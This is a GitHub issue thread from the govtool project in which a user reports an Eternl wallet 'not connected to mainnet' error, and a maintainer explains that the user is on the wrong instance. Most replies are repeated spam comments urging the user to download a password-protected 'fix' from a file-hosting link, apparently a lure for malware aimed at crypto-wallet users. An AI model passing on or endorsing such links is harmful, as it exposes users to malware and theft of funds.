### ISSUE TITLE
[USERSNAP] Hello, I have an issue while I try to connect my eternl wallet, It says it isn't conected to mainnet but it seems my wallet is working fine on various dex's...  I hope this helps  Have a great day  Gabriel

### ISSUE THREAD

**Issue by kickloop** [IntersectMBO/govtool#1892]
**Taken at**: https://sanchogov.tools/
**Fields**:
- Add a comment: Hello, I have an issue while I try to connect my eternl wallet, It says it isn&#39;t conected to mainnet but it seems my wallet is working fine on various dex&#39;s... 

I hope this helps 
Have a great day 

Gabriel

**Browser**: Chrome 128 (Windows 10)
**Screen size**: 1920x1080
**[Open #112 in Usersnap](https://app.usersnap.com/l/feedback/a3951b49-2106-4989-af6f-30cdc9fcb1aa?utm_medium=integration&utm_campaign=integration&utm_content=open)**

Powered by **[Usersnap](https://usersnap.com/?utm_source=product&amp;utm_medium=poweredbylink&amp;utm_campaign=github_entry)**.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Ryun1** [comment]
On incorrect instance, we will improve the banners to make this more clear https://github.com/IntersectMBO/govtool/issues/2002
